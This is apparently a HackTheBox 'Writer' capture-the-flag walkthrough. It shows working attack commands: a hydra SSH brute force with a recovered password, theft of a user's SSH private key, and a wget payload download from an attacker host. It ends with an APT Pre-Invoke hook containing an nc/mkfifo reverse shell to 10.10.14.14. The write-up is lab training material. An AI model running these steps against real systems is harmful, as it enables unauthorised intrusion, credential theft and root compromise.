HackTheBox – Writer Walkthrough

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A -v -T4 -Pn 10.10.11.101

┌──(rootkali)-[/home/kali/Downloads]

└─# echo 10.10.11.101 writer.htb > /etc/hosts

http://writer.htb/

┌──(rootkali)-[/home/kali/Downloads]

└─# wfuzz -w /usr/share/dirb/wordlists/big.txt -u http://writer.htb/FUZZ –hc 404 -t 200

http://writer.htb/administrative

Now SMBEnumeration

┌──(rootkali)-[/home/kali/Downloads]

└─# smbmap -H writer.htb –R

┌──(rootkali)-[/home/kali/Downloads]

└─# rpcclient -U “” -N writer.htb

rpcclient $> help

rpcclient $> enumdomusers

rpcclient $> queryuser kyle

┌──(rootkali)-[/home/kali/Downloads]

└─# hydra -l kyle -P rockyou.txt ssh://writer.htb -VV -f -t 60 

Username: kyle

Password: marcoantonio

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh kyle@10.10.11.101

kyle@writer:/tmp$ find / -type f -group filter 2>/dev/null

kyle@writer:/tmp$ cat /etc/postfix/disclaimer

So going through the script I tried to append the reverse shell in the script but the problem is before running the appended code there is a cron job that is set to clear the script to default state. So we have to use a python script to send this file as mail.

Code: shell.py

import smtplib

host = ‘127.0.0.1’

port = 25

sender_email = “kyle@writer.htb”

receiver_email = “kyle@writer.htb”

message = “””\

Subject: Hi there

Test_python_sender.”””

try:

    server = smtplib.SMTP(host, port)

    server.ehlo()

    server.sendmail(sender_email, receiver_email, message)

except Exception as e:

    print(e)

finally:

    server.quit()

┌──(rootkali)-[/home/kali/Downloads]

└─# nc -lvnp 1234

kyle@writer:/tmp$ cp disclaimer /etc/postfix/disclaimer && python3 shell.py

john@writer:/var/spool/postfix$ cd /home/john/.ssh/

john@writer:/home/john/.ssh$ ls –lrt

john@writer:/home/john/.ssh$ cat id_rsa

┌──(rootkali)-[/home/kali/Downloads]

└─# chmod 600 id_rsa

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh john@10.10.11.101 -i id_rsa  

kyle@writer:/tmp$ find / -type d -group management 2>/dev/null

https://github.com/DominicBreuker/pspy

john@writer:~$ cd /tmp

john@writer:/tmp$ wget http://10.10.14.14:8000/pspy32

john@writer:/tmp$ chmod +x pspy32

john@writer:/tmp$ ./pspy32

┌──(rootkali)-[/home/kali/Downloads]

└─# nc -lvnp 9000

So, to get a reverse shell need to enter this command and wait for a sec. Replace IP and start nc or pwncat in a new terminal for connection.

john@writer:/tmp$ cd /etc/apt/apt.conf.d/

john@writer:/etc/apt/apt.conf.d$ echo ‘APT::Update::Pre-Invoke: {“rm /tm/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 9000 >/tmp/f”};’ > /etc/apt/apt.conf.d/shell